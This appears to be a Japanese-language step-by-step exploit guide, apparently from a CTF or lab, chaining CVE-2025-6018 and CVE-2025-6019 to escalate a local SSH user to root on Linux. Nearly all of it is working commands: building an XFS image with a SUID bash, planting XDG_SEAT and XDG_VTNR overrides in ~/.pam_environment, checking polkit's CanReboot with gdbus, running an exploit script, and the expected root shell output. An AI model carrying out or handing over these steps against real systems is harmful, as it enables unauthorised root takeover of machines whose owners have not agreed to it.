CVE-2025-6018 + CVE-2025-6019 権限昇格ガイド
中文
📋 クイックエクスプロイト手順
ステップ 1: XFS イメージを準備する(ローカルマシン)
# Create 300MB XFS image
dd if=/dev/zero of=xfs.image bs=1M count=300
mkfs.xfs -f xfs.image
# Mount and install SUID bash
mkdir mnt
sudo mount -t xfs xfs.image mnt
sudo cp /bin/bash mnt/bash
sudo chmod 4755 mnt/bash
sudo umount mnt
rmdir mnt
# Verify (should show 300M)
ls -lh xfs.image
ステップ 2: ターゲットにファイルをアップロードする
ステップ 3: 最初のログイン - PAM を設定する
# SSH login to target
ssh [email protected]
# Write PAM environment variables
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
EOF
# Verify configuration
cat ~/.pam_environment
# 🔥 Critical: Logout (to activate PAM config)
exit
ステップ 4: 2回目のログイン - 権限昇格を実行する
# Re-login via SSH (PAM config now active)
ssh [email protected]
# Verify PAM is active (should return "('yes',)")
gdbus call --system --dest org.freedesktop.login1 \
--object-path /org/freedesktop/login1 \
--method org.freedesktop.login1.Manager.CanReboot
# Execute privilege escalation script
bash exp.sh
✅ 成功の兆候
権限昇格が成功すると、次のように表示されます:
✓ SUID bash found: /tmp/blockdev_loop0_xfs_xxxxx/bash
✓ Root access confirmed!
════════════════════════════════════════════════════════════
║ ROOT FLAG ║
║ <flag_here> ║
════════════════════════════════════════════════════════════
bash-5.2# whoami
root
🔧 トラブルシューティング
| 問題 | 解決方法 |
|---|
CanReboot が ('no',) を返す | ステップ 3 で一度ログアウトして再ログインしてください |
|
📌 重要ポイント
- ✅ ログアウトと再ログインが必須: PAM 設定は新しいセッションでのみ有効になります
- ✅ CanReboot を確認: スクリプト実行前に
('yes',) を返すことを確認してください
- ✅ SSH ログインを使用:
ssh -t user@host "cmd" 形式の実行は使用しないでください
🐱 キャットガーディアン
失敗した場合は、すべてのステップが厳密に順番どおりに実行されていることを確認してください!